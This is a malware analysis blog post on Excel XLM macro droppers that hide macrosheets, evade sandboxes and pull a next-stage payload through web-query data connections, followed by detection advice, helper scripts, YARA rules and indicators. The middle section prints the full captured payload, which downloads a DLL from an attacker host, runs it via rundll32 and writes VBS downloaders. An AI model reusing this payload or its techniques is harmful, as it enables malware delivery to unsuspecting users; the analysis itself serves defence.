Getting Sneakier: Hidden Sheets, Data Connections, and XLM Macros

March 18, 2020

Introduction

In January of 2019, we published a blog post titled “Extracting ‘Sneaky’ Excel XLM Macros” that detailed a technique attackers had adopted for embedding malicious logic in a less understood facet of Excel spreadsheets: Excel 4.0 macros, also known as XLM macros.

Over the past few weeks, we have observed a surge in maldocs leveraging XLM macros, a trend that other researchers have also noticed and analyzed. Examples include “A Safe Excel Sheet Not So Safe” written by Xavier Mertens, as well as “Excel 4.0 Macro MalSpam Campaigns” written by Diana Lopera.

In this post, we provide a detailed analysis of an interesting campaign that is tied to a variety of executable payloads, a subject matter we’ll be covering in a future blog. As of the time of writing, detection rates for this class of attack are relatively low, and these samples happily bypass the internal GSuite and O365 protection mechanisms.

We’ll dive into the analysis of two separate documents. The first one was attached to an email that was sent to us directly by the threat actor in late February (offline). The second was captured on March 17th, and in this case, the C2 servers are currently active.

Document One: inv-27101.xls

sha256: a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af | InQuest Labs – InQuest.net | VirusTotal

Document Two: Invoice85005.xls

sha256: bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f | InQuest Labs – InQuest.net | VirusTotal

Depicted below is a graphic extracted from this malicious document lure. Embedding coercive text within an image is a common tactic employed by attackers today: it attempts to bypass string-based detection engines while social engineering the target into activating the embedded logic. This document has one Excel sheet and one hidden macrosheet:

The macrosheet can be easily unhidden through the Microsoft Excel UI/UX, as seen here in this animation:

Once the target user enables the active content, an Auto_Open sequence is activated that pivots to the cell D49, the contents of which are shown here:

This embedded macro first checks a few conditions before executing its primary directive, exiting early if any of the following conditions are not met:

The cell containing GET.WORKSPACE(19) ensures a mouse is present.
The cell containing GET.WORKSPACE(42) ensures that the system is capable of playing sounds.
The cell containing GET.WORKSPACE(1) ensures that the environment is Windows.

These routines are anti-sandbox tactics. The actor wants to ensure that the sample is not being detonated by a behavioral analysis tool. To learn more about the GET.WORKSPACE() function, see Excel 4.0 Macro Functions Reference.
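When triaging a macrosheet, it can help to list which environment checks it performs. The following is a minimal sketch, not part of the original analysis: it scans formula text for GET.WORKSPACE calls and annotates only the three type numbers described above. The function name `environment_checks` and the lookup table are our own illustrative choices.

```python
import re

# Meanings of the GET.WORKSPACE type numbers described in the text above.
# Any other number is reported as unknown rather than guessed.
WORKSPACE_CHECKS = {
    1: "environment name and version (used here to require Windows)",
    19: "TRUE if a mouse is present",
    42: "TRUE if the system can play sounds",
}

_CALL = re.compile(r"GET\.WORKSPACE\((\d+)\)", re.IGNORECASE)


def environment_checks(formulas):
    """Return (type_number, description) for every GET.WORKSPACE call found."""
    found = []
    for formula in formulas:
        for match in _CALL.finditer(formula):
            number = int(match.group(1))
            description = WORKSPACE_CHECKS.get(number, "not described in this post")
            found.append((number, description))
    return found


if __name__ == "__main__":
    sample = ["=IF(GET.WORKSPACE(19),,CLOSE(TRUE))", "=IF(GET.WORKSPACE(42),,CLOSE(TRUE))"]
    for number, description in environment_checks(sample):
        print(number, description)
```

A sheet that queries several of these values before doing anything else is a reasonable hint that the author is trying to avoid automated detonation.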

Assuming the conditions are met, the primary directive stored within the cell labeled ‘asdf’ is executed. Let’s take a look at the cell ‘asdf’, depicted below:

This logic checks the content of cell U113 on the first sheet every 2 seconds, searching for the string ‘LOS’. The loop continues for as long as the string is found; otherwise, execution moves to cell I66, which carries the label ‘sfgdfsh’. The code in cells I66 to I69 copies cells U110 through U113 of Sheet1 into cells I70 through I73 of the macrosheet.

If you inspect cells U110 to U113 on Sheet1 without enabling the active content, you will see that they are empty. This is the most interesting aspect of this campaign and, so far as we know, a novel technique: the maldoc uses a “web query” object to pull cell content from a remote URL. The web query sends a request to the remote server upon document activation and keeps sending requests every few seconds afterward. The referenced URL (hxxps://pnxkntdl[.]xyz/KJSDBViad7) is visible in clear text when the document is opened in a hex viewer, for example:

To further analyze how the URL is triggered, we’ll use BiffView to parse the Excel document. If you search for the byte sequence ‘68 74 74 70’ (“http”), you’ll find that the URL lives within a BIFF DCONN record. This record triggers the web query. See the relevant flags highlighted in the depiction below, which aligns the BIFF record with the relevant documentation:
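The same lookup can be approximated in a few lines of code. The sketch below is an illustration under stated assumptions rather than a replacement for BiffView: it assumes the Workbook stream has already been extracted from the OLE container (for example with oledump), that the URL is stored as 8-bit text as seen in the hex view, and that it sits in the DCONN record itself rather than in a continuation. The helper names are ours.

```python
import re
import struct

DCONN = 0x0876  # record type of the data connection record

# Printable ASCII run starting with http:// or https://
URL = re.compile(rb"https?://[\x21-\x7e]+")


def iter_biff_records(stream):
    """Yield (record_type, data) pairs from a raw BIFF8 Workbook stream.

    Each record is a 2-byte little-endian type, a 2-byte little-endian
    length, and then that many bytes of data.
    """
    offset = 0
    while offset + 4 <= len(stream):
        record_type, size = struct.unpack_from("<HH", stream, offset)
        offset += 4
        yield record_type, stream[offset:offset + size]
        offset += size


def dconn_urls(stream):
    """Return URLs found inside DCONN records of the given stream."""
    urls = []
    for record_type, data in iter_biff_records(stream):
        if record_type == DCONN:
            urls.extend(m.group().decode("ascii") for m in URL.finditer(data))
    return urls
```

Restricting the search to DCONN records, instead of grepping the whole file, avoids reporting URLs that merely appear in cell text or document metadata.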

The data returned from the remote URL is an XHTML (XML) document, and the web query content is enclosed within the ‘<pre>’ element of that document.

The web query requests and responses are sent over an encrypted channel (HTTPS). To inspect the communications between Excel and the remote site, we use mitmproxy. By default, mitmproxy listens on 127.0.0.1:8080, so we change the proxy setting of the system to redirect all traffic through 127.0.0.1:8080:

The following content was returned from the remote URL, when the web query was executed in our lab:

<html>

<head><base href="/lander/excel4_1581586732/index.html">

<link rel="stylesheet" href="resource://content-accessible/plaintext.css">

</head>

<body>

<pre>

=CLOSE(FALSE)

=CLOSE(FALSE)

=CLOSE(FALSE)

=CLOSE(FALSE)"</pre>

</body>

</html>

The content of the <pre> element is copied to cells U110 through U113. Because the resulting content of U113 contains the substring ‘LOS’, the macro loops and checks again two seconds later. The retrieved payload is completely benign. So what’s going on here? This is good operational security on the part of the actor: the remote server has not deemed us worthy of receiving the next stage of this malware. Perhaps the restriction is regional, perhaps it is something else. Luckily, we got another document.
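To see what a captured response would place into the sheet, the lines of the <pre> element can be pulled out with the Python standard library. This is a small sketch of that idea, not a model of how Excel itself parses web query responses; the class and function names are hypothetical, and one formula per line (or per <br>) is assumed.

```python
from html.parser import HTMLParser


class PreExtractor(HTMLParser):
    """Collect the text found inside <pre> elements."""

    def __init__(self):
        super().__init__()
        self._in_pre = False
        self._chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "pre":
            self._in_pre = True
        elif tag == "br" and self._in_pre:
            self._chunks.append("\n")  # treat <br> as a line break

    def handle_endtag(self, tag):
        if tag == "pre":
            self._in_pre = False

    def handle_data(self, data):
        if self._in_pre:
            self._chunks.append(data)

    def lines(self):
        text = "".join(self._chunks)
        return [line.strip() for line in text.splitlines() if line.strip()]


def pre_lines(document):
    """Return the non-empty lines inside the <pre> element of a response."""
    parser = PreExtractor()
    parser.feed(document)
    parser.close()
    return parser.lines()


def is_benign_placeholder(lines):
    """True when every returned line is just a CLOSE call, as in the response above."""
    return bool(lines) and all(line.upper().startswith("=CLOSE(") for line in lines)
```

Applied to the response shown above, `pre_lines` yields the four CLOSE lines and `is_benign_placeholder` reports that no real payload was served.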

Analysis of Document Two: Invoice85005.xls

Similar to the previous sample, this one contains an Excel sheet and a “very” hidden macrosheet. Very hidden macrosheets cannot be revealed via a simple UI/UX toggle; the file must be hex edited before they become visible within the native Excel application. See our previous blog for more information. Again, a graphical lure with coercive text is used to entice the user into activating the embedded logic:

To unhide the macrosheet, we use Hexinator to change the visibility state of the macrosheet manually. We know from previous research that the records for hidden and very hidden sheets start with the patterns “85 00 ?? ?? ?? ?? ?? ?? 01 01” and “85 00 ?? ?? ?? ?? ?? ?? 02 01” respectively. To unhide these sheets, we just need to set the ninth byte to zero, as shown here in an animation:

Updating byte 9 in hex editor to unhide the sheets
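The manual hex edit can also be scripted. The sketch below simply searches for the two byte patterns given above and zeroes the ninth byte of each hit. It is a naive pattern match, not a BIFF parser, so it could in principle touch unrelated bytes that happen to look the same; run it on a copy of the sample and review the reported count. The function name is our own.

```python
import re

# 85 00, six bytes we do not inspect, then the visibility byte
# (01 = hidden, 02 = very hidden) followed by 01.
HIDDEN_MACRO_SHEET = re.compile(rb"\x85\x00.{6}[\x01\x02]\x01", re.DOTALL)


def unhide_macro_sheets(data):
    """Return (patched_bytes, number_of_patches) with matching sheets made visible."""
    patched = bytearray(data)
    count = 0
    for match in HIDDEN_MACRO_SHEET.finditer(data):
        patched[match.start() + 8] = 0x00  # ninth byte of the record
        count += 1
    return bytes(patched), count


if __name__ == "__main__":
    import sys

    source, destination = sys.argv[1], sys.argv[2]
    with open(source, "rb") as handle:
        original = handle.read()
    result, patches = unhide_macro_sheets(original)
    with open(destination, "wb") as handle:
        handle.write(result)
    print(f"patched {patches} sheet record(s)")
```

Because only a single byte changes per record, the file length and all offsets stay the same, which is why this edit does not corrupt the workbook.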

Again, the macro checks a few conditions:

=IF(GET.WORKSPACE(42),,CLOSE(TRUE))

=GET.WORKSPACE(13)

=GET.WORKSPACE(14)

=IF(H24<770, CLOSE(FALSE),)

=IF(H25<381, CLOSE(FALSE),)

=IF(GET.WORKSPACE(19),,CLOSE(TRUE))

=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ON.TIME(NOW()+"00:00:02", "agawf23f"),CLOSE(TRUE))

=RETURN()

It also checks whether the macrosheet is hidden:

=WORKBOOK.HIDE("0TQ1ByZPP5", TRUE)

We can easily patch this condition by changing TRUE to FALSE.

It then jumps to U33 (agawf23f label):

=IF(ISNUMBER(SEARCH("s",Sheet1!S70)), GOTO(P54), ON.TIME(NOW()+"00:00:02", "rstegerg3"))

=RETURN()

=IF(ISNUMBER(SEARCH("s",Sheet1!S70)), GOTO(P54), ON.TIME(NOW()+"00:00:02", "agawf23f"))

=RETURN()

This file also contains a web query object. The remote URL is seen below (hxxps://tdvomds[.]pw/12341324rfefv):

The web query will populate a few cells in Sheet1 if it can successfully connect to the remote URL. The above macrosheet copies these cells from Sheet1 to the macrosheet and then executes the lines.

Again, we use mitmproxy to capture the web query response. Another approach is to modify the macro before enabling active content so that the second-level macro is never executed. However, we are also interested in capturing the HTTP response.

The HTTP response contains an XHTML document, and this time, we are worthy of receiving the next-stage payload:

<html>

<head><base href="/lander/df3f1f14f134f314f/index.html">

<link rel="stylesheet" href="resource://content-accessible/plaintext.css">

</head>

<body>

<pre>

="https://tdvomds.pw/fef23f23f"<br>

=GET.WORKSPACE(26)<br>

="C:\Users\"&R[-1]C&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"<br>

="C:\Users\"&R[-2]C&"\AppData\Local\Temp\"&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&RANDBETWEEN(100,999)&".vbs"<br>

="C:\Users\"&R[-3]C&"\AppData\Local\Temp\"&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&RANDBETWEEN(1000,9999)&".vbs"<br>

=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))), GOTO(R[2]C),)<br>

=IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))), GOTO(R[7]C),)<br>

=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-7]C,R[-5]C,0,0)<br>

=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2)<br>

=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",""&R[-7]C&",DllRegisterServer",0,5)<br>

=CLOSE(FALSE)<br>

=LEFT(CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122)), RANDBETWEEN(4, 8))<br>

=LEFT(CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122)), RANDBETWEEN(4, 8))<br>

=FOPEN(R[-10]C,3)<br>

=FWRITELN(R[-1]C,"Dim "&R[-3]C&", "&R[-2]C&"")<br>

=FWRITELN(R[-2]C,"Set "&R[-4]C&" = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")<br>

=FWRITELN(R[-3]C,""&R[-5]C&".setOption(2) = 13056")<br>

=FWRITELN(R[-4]C,""&R[-6]C&".Open ""GET"", """&R[-17]C&""", False")<br>

=FWRITELN(R[-5]C,""&R[-7]C&".setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")<br>

=FWRITELN(R[-6]C,""&R[-8]C&".Send")<br>

=FWRITELN(R[-7]C,"If "&R[-9]C&".Status = 200 Then")<br>

=FWRITELN(R[-8]C,"Set "&R[-9]C&" = CreateObject(""ADODB.Stream"")")<br>

=FWRITELN(R[-9]C,""&R[-10]C&".Open")<br>

=FWRITELN(R[-10]C,""&R[-11]C&".Type = 1")<br>

=FWRITELN(R[-11]C,""&R[-12]C&".Write "&R[-13]C&".ResponseBody")<br>

=FWRITELN(R[-12]C,""&R[-13]C&".SaveToFile """&R[-23]C&""", 2")<br>

=FWRITELN(R[-13]C,""&R[-14]C&".Close")<br>

=FWRITELN(R[-14]C,"End If")<br>

=FCLOSE(R[-15]C)<br>

=EXEC("explorer.exe "&R[-26]C&"")<br>

=WAIT(NOW()+"00:00:05")<br>

=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2)<br>

=FOPEN(R[-28]C,3)<br>

=FWRITELN(R[-1]C,"Set obj = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")<br>

=FWRITELN(R[-2]C,"obj.Document.Application.ShellExecute ""rundll32.exe"","" "&R[-32]C&",DllRegisterServer"",""C:\Windows\System32"",Null,0")<br>

=FCLOSE(R[-3]C)<br>

=EXEC("explorer.exe "&R[-32]C&"")<br>

=FILE.DELETE(R[-34]C)<br>

=CLOSE(FALSE)<br>

=RETURN()<br>

</pre>

</body>

</html>

The content of the <pre> element from the XHTML document is written to the sheet and executed as the next stage.
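The payload is hard to read because every argument is a relative R1C1 reference such as R[-7]C, meaning "the cell seven rows above in the same column". A small helper can translate these into row indexes. The sketch below assumes one formula per row in a single column, as in the <pre> listing; the function name and the abbreviated sample rows (with placeholder strings instead of the real URL and paths) are ours.

```python
import re

RELATIVE_REF = re.compile(r"R\[(-?\d+)\]C")


def resolve_relative_refs(lines):
    """Map each row index to the row indexes its R[n]C references point at."""
    targets = {}
    for row, formula in enumerate(lines):
        offsets = [int(m.group(1)) for m in RELATIVE_REF.finditer(formula)]
        if offsets:
            targets[row] = [row + offset for offset in offsets]
    return targets


if __name__ == "__main__":
    # First eight rows of the payload, abbreviated.
    payload = [
        '="<download URL>"',                                   # row 0
        "=GET.WORKSPACE(26)",                                  # row 1
        '="<Temp>"&R[-1]C&"CVR....tmp.cvr"',                   # row 2
        '="<Temp>"&R[-2]C&"....vbs"',                          # row 3
        '="<Temp>"&R[-3]C&"....vbs"',                          # row 4
        '=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))), GOTO(R[2]C),)',
        '=IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))), GOTO(R[7]C),)',
        '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-7]C,R[-5]C,0,0)',
    ]
    for row, rows in resolve_relative_refs(payload).items():
        print(row, "->", rows)
```

For the download call on row 7 this resolves to rows 0 and 2, that is, the URL and the CVR temp path, which matches the behavior described for this sample.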

In this particular case, the pivot macro downloads a DLL file from hxxps://tdvomds[.]pw/fef23f23f (sha256: acc5fe0088037ddc055f9286380c56583effa1186afe9d08caea3e197b2643fd; warning, actual sample) and executes rundll32 to call its DllRegisterServer function, which registers and executes it. The logic within the DLL communicates with the following C&C servers:

hxxps://aquolepp[.]pw/milagrecf.php
hxxps://dhteijwrb[.]host/milagrecf.php
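Beyond the network indicators, the file names built by the payload follow fixed patterns: the download is saved as CVR plus four digits plus ".tmp.cvr", and the helper scripts as three lowercase letters plus three or four digits plus ".vbs", all under the user's Temp directory. A hedged sketch of a matcher for these names follows. The regular expressions are derived from the RANDBETWEEN ranges in the payload above, the function name and labels are ours, and legitimate files may share these shapes, so a match is a lead rather than a verdict.

```python
import ntpath
import re

# "CVR" & RANDBETWEEN(1000,9999) & ".tmp.cvr"
DOWNLOAD_NAME = re.compile(r"^CVR[1-9]\d{3}\.tmp\.cvr$")
# three CHAR(RANDBETWEEN(97,122)) letters, then RANDBETWEEN(100,999)
# or RANDBETWEEN(1000,9999), then ".vbs"
SCRIPT_NAME = re.compile(r"^[a-z]{3}[1-9]\d{2,3}\.vbs$")


def classify_temp_file(path):
    """Label a Windows path whose file name matches the payload's naming scheme."""
    name = ntpath.basename(path)
    if DOWNLOAD_NAME.match(name):
        return "downloaded payload"
    if SCRIPT_NAME.match(name):
        return "dropped script"
    return None
```

For example, `classify_temp_file(r"C:\Users\bob\AppData\Local\Temp\qwe4821.vbs")` returns `"dropped script"`, while an ordinary name such as `notes.vbs` returns `None`.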

Detection and Mitigation

Optical Character Recognition (OCR)

A solid generic approach to detect this and many similar malicious document lures is to carve out the embedded image and then extract the semantic content via OCR. Within the XLS/BIFFv8 format, records have a maximum size of 8,228 bytes. If the size of data is greater than what can fit in a single record, then the data must be split into chunks. The first chunk is put in the first record, and the rest of the data chunks are placed in subsequent CONTINUE (3Ch) records. To successfully extract images from XLS files, one needs to strip these CONTINUE headers from the extracted image. To accomplish this task automatically, we’ve extended the oledump BIFF plugin (plugin_biff.py) to include a new command line switch for extracting images. You can find our patch in our GitHub repository (lines 570 to 603):
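The reassembly step described above can be illustrated independently of the plugin. The following is a minimal sketch and not the code from our patch: it takes records as already-parsed (type, data) pairs, so the 4-byte CONTINUE headers are dropped simply by concatenating the data portions. It also ignores the extra bytes that some record types insert at continuation boundaries. The function name is illustrative.

```python
CONTINUE = 0x003C  # record type of a CONTINUE record


def merge_continue_records(records):
    """Join each record's data with the data of the CONTINUE records that follow it.

    `records` is an iterable of (record_type, data) pairs in stream order.
    Returns a list of (record_type, data) pairs without CONTINUE entries.
    """
    merged = []
    for record_type, data in records:
        if record_type == CONTINUE and merged:
            previous_type, previous_data = merged[-1]
            merged[-1] = (previous_type, previous_data + data)
        else:
            merged.append((record_type, data))
    return merged
```

Once the chunks are joined, an image can be carved from the merged data by looking for its file signature, without record headers interrupting the image bytes.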

https://github.com/InQuest/DidierStevensSuite/blob/BIFF-Image-Dump-Switch/plugin_biff.py#L570-L592

Suspicious Attributes

Didier Stevens’ oledump is a de facto standard tool in the arsenal of a maldoc analyst. The BIFF plugin that we modified above to extract images can also filter for the DCONN record that both documents use to retrieve a next-stage pivot:

$ oledump.py -p plugin_biff sample00/inv-27101.xls --pluginoptions "-o 876"
  1:      4096 '\x05DocumentSummaryInformation'
  2:       240 '\x05SummaryInformation'
  3:    101088 'Workbook'
               Plugin: BIFF plugin
                 0876    135 DCONN : Data Connection

Additionally specifying the option to dump contents as a string, one can expose the embedded URL as well:

$ oledump.py -p plugin_biff sample00/inv-27101.xls --pluginoptions "-o 876 -s"
  1:      4096 '\x05DocumentSummaryInformation'
  2:       240 '\x05SummaryInformation'
  3:    101088 'Workbook'
               Plugin: BIFF plugin
                 0876    135 DCONN : Data Connection
                 ASCII: Connection hxxps://pnxkntdl[.]xyz/KJSDBViad7 Sheet1!DSKVJBdsj2

We’ve written and open-sourced a generic YARA hunting rule that looks for Microsoft Excel documents that contain a DCONN record and a URL:

Microsoft Excel Data Connection

To increase the detection accuracy, we can combine the above YARA rule with the following one to check the existence of hidden and “very” hidden macro sheets:

Microsoft Excel Hidden Macro Sheet

The samples above are all available for research and download via our open data portal https://labs.inquest.net.

IOCs

a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af
acc5fe0088037ddc055f9286380c56583effa1186afe9d08caea3e197b2643fd
bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f
hxxps://aquolepp[.]pw/milagrecf.php
hxxps://dhteijwrb[.]host/milagrecf.php
hxxps://pnxkntdl[.]xyz/KJSDBViad7
hxxps://tdvomds[.]pw/12341324rfefv
hxxps://tdvomds[.]pw/fef23f23f
aquolepp[.]pw
dhteijwrb[.]host
pnxkntdl[.]xyz
tdvomds[.]pw

About the Authors

Amirreza Niakanlahiji

Pedram Amini

CTO

Currently serving as CTO under InQuest.net, Pedram was formerly a director at Avast, after the acquisition of his startup Jumpshot. Previously, he founded the Zero Day Initiative at TippingPoint, where he built and managed the world's largest group of independent researchers. He's had a long-time passion for reverse engineering, developing automation tools and processes. Pedram holds a CS degree from Tulane University and is an author of the book "Fuzzing: Brute Force Vulnerability Discovery".
